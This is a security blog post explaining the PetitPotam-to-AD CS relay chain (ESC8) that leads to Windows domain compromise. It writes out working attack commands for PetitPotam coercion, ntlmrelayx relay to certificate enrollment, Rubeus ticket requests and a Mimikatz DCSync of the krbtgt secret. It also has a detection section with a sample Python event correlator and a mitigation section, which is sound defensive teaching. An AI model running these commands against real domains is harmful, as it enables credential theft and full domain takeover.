Exploiting CVE-2021-26414 PetitPotam, ADCS, and Domain Compromise

Table of Contents#

  1. Introduction to CVE-2021-26414: A Critical Privilege Escalation Vulnerability
  2. Understanding the Vulnerability: PetitPotam and ADCS Misconfiguration
  3. Exploitation Mechanism of CVE-2021-26414
  4. Step-by-Step Exploitation Process
  5. Post-Exploitation: Gaining Domain Admin Privileges
  6. Detection Strategies for CVE-2021-26414
  7. Mitigation and Best Practices to Prevent Exploitation
  8. Conclusion and Key Takeaways
  9. References for Further Reading

CVE-2021-26414 is the label this post uses for an attack chain that combines PetitPotam (authentication coercion over MS-EFSRPC) with a weakly configured Active Directory Certificate Services (AD CS) web enrollment endpoint, the combination commonly catalogued as ESC8. A note on identifiers for the practitioner: Microsoft tracks the PetitPotam coercion itself as CVE-2021-36942 (Windows LSA Spoofing Vulnerability, fixed in the August 2021 updates) and publishes the AD CS relay mitigations in KB5005413; CVE-2021-26414 proper is the Windows DCOM Server Security Feature Bypass, a separate hardening change. Whatever the label, the chain works the same way: the attacker forces a domain controller to authenticate over NTLM, relays that authentication to AD CS, receives a certificate for the DC's machine account, and uses it to obtain a Kerberos TGT and DCSync the domain, which is full domain compromise. It affects domain-joined Windows Server (and client) versions that expose the EFSRPC interface, together with any AD CS deployment that accepts NTLM for HTTP enrollment.

PetitPotam Overview#

PetitPotam abuses the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC), which is exposed over the lsarpc and efsrpc named pipes on domain-joined Windows hosts. Methods such as EfsRpcOpenFileRaw and EfsRpcEncryptFileSrv take a UNC path; by supplying a path on an attacker-controlled host, the caller makes the target's machine account connect to that host and authenticate with NTLM. No misconfiguration of the coerced host is required. What the chain then depends on is a relay target that accepts the forwarded NTLM exchange without signing or channel binding.

ADCS Overview#

Active Directory Certificate Services (AD CS) issues certificates to users, computers and services in a Windows domain. Its optional Certificate Authority Web Enrollment role (the /certsrv pages) authenticates requests with NTLM over HTTP by default, and plain HTTP carries no signing or channel binding, so a relayed NTLM exchange is accepted as a genuine enrollment by the relayed identity. That identity gets a certificate for any template it is entitled to enroll in; a domain controller's machine account is entitled to the DomainController template, which is enough to authenticate to Kerberos as the DC.

2. Exploitation Mechanism#

PetitPotam Tool: Abusing MS-EFSRPC for NTLM Authentication Relay#

  1. PetitPotam abuses MS-EFSRPC to make a domain controller (or any domain-joined Windows host) open a UNC path on the attacker's machine, so the target authenticates to the attacker with NTLM. The attacker never learns a password; it only sits in the middle of the live challenge-response.
  2. The attacker runs Impacket's ntlmrelayx.py as that listener and forwards the NTLM exchange (the live messages, not a hash: a captured NTLM hash cannot be relayed) to the AD CS web enrollment endpoint.
  3. If web enrollment accepts NTLM over HTTP without Extended Protection for Authentication, the CA issues a certificate to the relayed identity, the DC's machine account. The attacker exchanges that certificate for a Kerberos TGT with PKINIT and, because DC accounts hold directory replication rights, runs DCSync to pull every credential in the domain, Domain Admins included.

3. Step-by-Step Exploitation of CVE-2021-26414#

Step 1: Attacker’s Setup#

The attacker needs network reachability to the Domain Controller and to the AD CS server, plus a low-privileged domain account: the August 2021 update for CVE-2021-36942 closes the unauthenticated EfsRpcOpenFileRaw path through lsarpc, but the remaining EFSRPC methods still coerce when any domain credential is supplied. On the target side the DC must expose the EFSRPC interface (the default), and the AD CS server must have Certificate Authority Web Enrollment installed, reachable over HTTP with NTLM enabled and without Extended Protection for Authentication.

Step 2: Triggering MS-EFSRPC Authentication#

PetitPotam calls one of the EFSRPC methods with a UNC path that points at the attacker's listener. The target resolves that path and authenticates to the listener with its machine account over NTLM; that exchange, captured live, is what the relay forwards.

**Command to Run PetitPotam**:#

# Trigger the coercion. Start the ntlmrelayx listener (Step 3) before running this.
# PetitPotam takes the LISTENER address before the TARGET address. The credentials
# are any low-privileged domain account (required against hosts patched for
# CVE-2021-36942; unpatched hosts also accept the call with no credentials).
python3 PetitPotam.py -d <domain> -u <low-priv-user> -p <password> <attacker-ip> <target-dc-ip>
  • <attacker-ip>: IP address of the attacker's listener (the ntlmrelayx host the DC will authenticate to).
  • <target-dc-ip>: IP address of the Domain Controller (or other domain-joined host) whose machine account is to be relayed.

This makes the target authenticate to the attacker's machine with NTLM; that exchange is what the next step relays.

Step 3: Relay NTLM Authentication to ADCS Server#

Once the coerced authentication arrives, Impacket's ntlmrelayx.py, already listening, relays it to the AD CS web enrollment endpoint.

Impacket Relay Command:#

Start ntlmrelayx before running PetitPotam so the listener is ready for the callback:

python3 ntlmrelayx.py -t http://<adcs-server>/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
  • <adcs-server>: IP address or hostname of the AD CS server running Certificate Authority Web Enrollment.
  • --adcs turns the relayed HTTP session into a certificate request; --template names the template to enroll in (DomainController when the coerced host is a DC, Machine for an ordinary member server).

This forwards the live NTLM exchange from the DC to the AD CS server, which issues a certificate for the DC's machine account; ntlmrelayx prints it as a base64-encoded PKCS#12 blob, which you save to a file for the next step.

Step 4: Certificate Issued for the Relayed Account#

The certificate the CA returns belongs to the identity that was relayed, i.e. the domain controller's machine account (for example DC01$), not to an arbitrary account of the attacker's choosing. That is enough: a DomainController-template certificate lets its holder authenticate to Kerberos as the DC, and the DC account can replicate directory secrets.

If web enrollment has no Extended Protection and accepts NTLM over HTTP, the CA cannot tell the relayed request from a genuine one, so it issues the certificate for whatever template the relayed account may enroll in.


Post-Exploitation: Impersonating the Domain Controller#

The certificate is exchanged for a Kerberos TGT with PKINIT. Mimikatz's kerberos::ptt injects a .kirbi ticket, not a certificate, so the first step uses Rubeus (or gettgtpkinit.py from PKINITtools on Linux); Mimikatz then performs the DCSync with the injected ticket.

Rubeus Command to Request and Inject a TGT from the Certificate:#

# Ask the KDC for a TGT as the DC's machine account using the relayed PKCS#12 and inject it (/ptt)
Rubeus.exe asktgt /user:<dc-name>$ /certificate:<base64-pfx-or-path> /ptt
# With the DC's TGT in the session, replicate the krbtgt secret (or any account) via DCSync
mimikatz.exe "lsadump::dcsync /user:<domain>\krbtgt" "exit"

With the krbtgt hash (or a Domain Admin's hash pulled the same way) the attacker can forge tickets or pass-the-hash as any account, which is Domain Admin in all but name.


5. Detection and Mitigation#

Detection#

  1. Authentication logs on the relay target (Event ID 4624, not 4648):
    • A relay shows up on the AD CS server as a successful network logon (4624, logon type 3, authentication package NTLM) for a machine account such as DC01$ whose source IP is not the DC's own address. Event ID 4648 ("a logon was attempted using explicit credentials") is written by the client that supplies credentials and does not fire for a relayed exchange.
  2. Coercion traffic on the DC:
    • With object access auditing for file shares enabled, Event ID 5145 on the DC records access to \\*\IPC$ with RelativeTargetName lsarpc or efsrpc from an ordinary workstation or an unknown host. On the wire, MS-EFSRPC calls carrying a UNC path that points at something other than a file server are the direct signature of PetitPotam.
  3. Certificate issuance on the CA:
    • Enable Certification Services auditing (certutil -setreg CA\AuditFilter 127 plus the "Audit Certification Services" subcategory) and alert on Event ID 4886 (request received) and 4887 (certificate issued) where the requester is a machine account, the template is DomainController or another authentication-capable template, and the request came through web enrollment rather than autoenrollment. The IIS logs on the CA show the matching POST to /certsrv/certfnsh.asp from the attacker's address.
  4. Use of the new certificate and the follow-on DCSync:
    • Event ID 4768 on the DC with the Certificate Information fields populated (issuer name and serial number) for a machine account, from an address that is not that machine, is PKINIT with the relayed certificate. Expect it to be followed by Event ID 4662 for the same source with the DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) property GUIDs, which is DCSync.
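The detection points above, implemented as a small correlator run over constructed sample events. This is an added example for this post, not code from the original page. The event dicts mirror the field names of Security events 4624, 4886/4887 and 4768 but are constructed here, not real logs; the HOST_INVENTORY mapping of computer accounts to their real addresses is an assumption a deployment would fill from DNS or an asset inventory, and the ten-minute correlation window is a tuning choice.

```python
"""Correlate Security/AD CS audit events that together indicate a
PetitPotam -> AD CS relay followed by PKINIT with the issued certificate.

Added example, not code from the original page. SAMPLE_EVENTS are constructed
to mirror the fields of events 4624, 4886, 4887 and 4768; feed parsed EVTX
records with the same keys into correlate() in a real pipeline.
"""
from datetime import datetime, timedelta

# Assumption: inventory of computer accounts and their real addresses.
HOST_INVENTORY = {"DC01$": "10.0.0.10", "CA01$": "10.0.0.20", "WS07$": "10.0.0.70"}
# Templates whose certificates let the holder authenticate as a DC.
HIGH_VALUE_TEMPLATES = {"DomainController", "DomainControllerAuthentication",
                        "KerberosAuthentication"}
WINDOW = timedelta(minutes=10)  # tuning choice: how close the events must be

SAMPLE_EVENTS = [  # constructed, not real logs
    # On the CA: DC01$ logs on with NTLM from 10.0.0.99, which is not DC01.
    {"time": "2025-04-10T09:00:01", "id": 4624, "host": "CA01", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "DC01$",
     "IpAddress": "10.0.0.99"},
    # On the CA: request received, then certificate issued, for DC01$ in the
    # DomainController template.
    {"time": "2025-04-10T09:00:02", "id": 4886, "host": "CA01",
     "Requester": "CORP\\DC01$", "Attributes": "CertificateTemplate:DomainController"},
    {"time": "2025-04-10T09:00:03", "id": 4887, "host": "CA01", "RequestId": 421,
     "Requester": "CORP\\DC01$", "Attributes": "CertificateTemplate:DomainController"},
    # On the DC: TGT requested for DC01$ with PKINIT (certificate fields set)
    # from the same foreign address.
    {"time": "2025-04-10T09:01:00", "id": 4768, "host": "DC01",
     "TargetUserName": "DC01$", "IpAddress": "::ffff:10.0.0.99",
     "CertIssuerName": "corp-CA01-CA", "CertSerialNumber": "1a00000007"},
    # Benign noise: a workstation renewing its Machine certificate over Kerberos.
    {"time": "2025-04-10T09:05:00", "id": 4887, "host": "CA01", "RequestId": 422,
     "Requester": "CORP\\WS07$", "Attributes": "CertificateTemplate:Machine"},
    {"time": "2025-04-10T09:05:01", "id": 4624, "host": "CA01", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "WS07$",
     "IpAddress": "10.0.0.70"},
]


def sam_name(value):
    """'CORP\\DC01$' -> 'DC01$'."""
    return value.rsplit("\\", 1)[-1]


def normalize_ip(value):
    """4768 logs IPv4 as IPv4-mapped IPv6; strip the prefix for comparison."""
    return value[len("::ffff:"):] if value.startswith("::ffff:") else value


def template_of(attributes):
    """Pull the CertificateTemplate value out of the request attributes blob."""
    for line in attributes.replace("\r", "").split("\n"):
        if line.startswith("CertificateTemplate:"):
            return line.split(":", 1)[1].strip()
    return None


def off_host(account, ip):
    """True when a machine account authenticates from an address that is not its own."""
    expected = HOST_INVENTORY.get(account)
    return expected is not None and normalize_ip(ip) != expected


def correlate(events):
    """Return findings in time order; each carries kind, severity, account, evidence."""
    relay_seen, issued, findings = {}, {}, []
    for e in sorted(events, key=lambda ev: ev["time"]):
        t = datetime.fromisoformat(e["time"])
        if e["id"] == 4624:
            acct = e["TargetUserName"]
            if (e["LogonType"] == 3 and e["AuthenticationPackageName"] == "NTLM"
                    and acct.endswith("$") and off_host(acct, e["IpAddress"])):
                relay_seen[acct] = t
                findings.append({"kind": "ntlm_relay_suspect", "severity": "medium", "account": acct,
                                 "evidence": f"4624 NTLM logon as {acct} from {e['IpAddress']} on {e['host']}"})
        elif e["id"] == 4887:
            acct = sam_name(e["Requester"])
            tpl = template_of(e["Attributes"])
            if acct.endswith("$") and tpl in HIGH_VALUE_TEMPLATES:
                issued[acct] = t
                seen = relay_seen.get(acct)
                if seen is not None and t - seen <= WINDOW:
                    gap = int((t - seen).total_seconds())
                    findings.append({"kind": "esc8_cert_issued", "severity": "high", "account": acct,
                                     "evidence": f"4887 issued {tpl} cert to {acct} {gap}s after suspicious NTLM logon"})
        elif e["id"] == 4768 and e.get("CertSerialNumber"):
            acct = e["TargetUserName"]
            when = issued.get(acct)
            if when is not None and t - when <= WINDOW and off_host(acct, e["IpAddress"]):
                findings.append({"kind": "pkinit_with_relayed_cert", "severity": "critical", "account": acct,
                                 "evidence": f"4768 PKINIT as {acct} from {e['IpAddress']} with serial {e['CertSerialNumber']}"})
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['kind']}: {f['evidence']}")
```

The three rules escalate as the chain progresses: a machine account using NTLM from the wrong address is only suspicious on its own, a high-value certificate issued to that account minutes later is strong evidence, and a PKINIT logon with that certificate from the foreign address is the compromise itself. The WS07$ events show why the inventory check matters: a workstation renewing its own Machine certificate from its own address produces nothing.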

Mitigation#

  1. Apply Microsoft's updates and follow KB5005413:
    • The August 2021 update for CVE-2021-36942 closes the unauthenticated EfsRpcOpenFileRaw path through lsarpc; KB5005413 describes the AD CS changes in item 3. The DCOM hardening released under CVE-2021-26414 is a separate change and does not stop this chain, so do not treat that patch as closure.
  2. Block MS-EFSRPC where it is not needed:
    • EFSRPC lives inside LSASS and is not a separately stoppable service. Use RPC filters (netsh rpc filter) to block the two MS-EFSRPC interface UUIDs, c681d488-d850-11d0-8c52-00c04fd90f7e and df1941c5-fe89-4e79-bf10-463657acf44d, on domain controllers that do not serve EFS, or restrict the callers to the hosts that legitimately need it.
  3. Harden AD CS enrollment:
    • Uninstall Certificate Authority Web Enrollment and the Certificate Enrollment Web Service if nobody uses them. If they stay, require HTTPS, set Extended Protection for Authentication to Required on their IIS sites, and remove NTLM from the Windows Authentication providers so only Kerberos is accepted. Do not try to restrict enrollment to Domain Admins: computers must enroll for their own templates. Instead audit which principals hold Enroll on authentication-capable templates and remove the ones that should not.
  4. Require SMB and LDAP signing:
    • SMB signing, and LDAP signing with channel binding, stop relay to SMB and LDAP targets, the other destinations a coerced DC authentication can be sent to. They do nothing for the HTTP relay to AD CS, which is why item 3 is what actually closes this chain.
  5. Reduce NTLM, not just NTLMv1:
    • Disabling NTLMv1 is good hygiene but does not prevent relay: the attacker forwards the live NTLMv2 challenge-response without ever cracking it. Use the NTLM audit and restriction policies to deny NTLM to the AD CS server and, where feasible, to domain controllers.
  6. Audit and restrict SMB shares:
    • Tight share permissions are general hygiene and limit what a relayed identity could read if it were sent to an SMB target, but they do not affect the relay to AD CS.

6. Conclusion and Key Takeaways#

The chain this post files under CVE-2021-26414 (PetitPotam coercion plus an AD CS web enrollment endpoint that accepts NTLM over HTTP) is a reliable route from any domain account to full domain compromise: coerce the DC, relay to AD CS, take the DC's certificate, PKINIT to a TGT, DCSync.

Closing it means patching the coercion (CVE-2021-36942), blocking EFSRPC where it is not needed, and above all hardening or removing AD CS web enrollment (HTTPS plus Extended Protection, no NTLM). Auditing on the CA (4886/4887), on domain controllers (4624, 4768, 4662) and on the network gives early warning when the chain is attempted.


**References for Further Reading**#

Source page: Exploiting CVE-2021-26414 PetitPotam, ADCS, and Domain Compromise
https://bad-glitch.github.io/posts/active-directory/cve21-26414/cve-2021-26414/
Author: Amr Abdel Hamide
Published at: 2025-04-10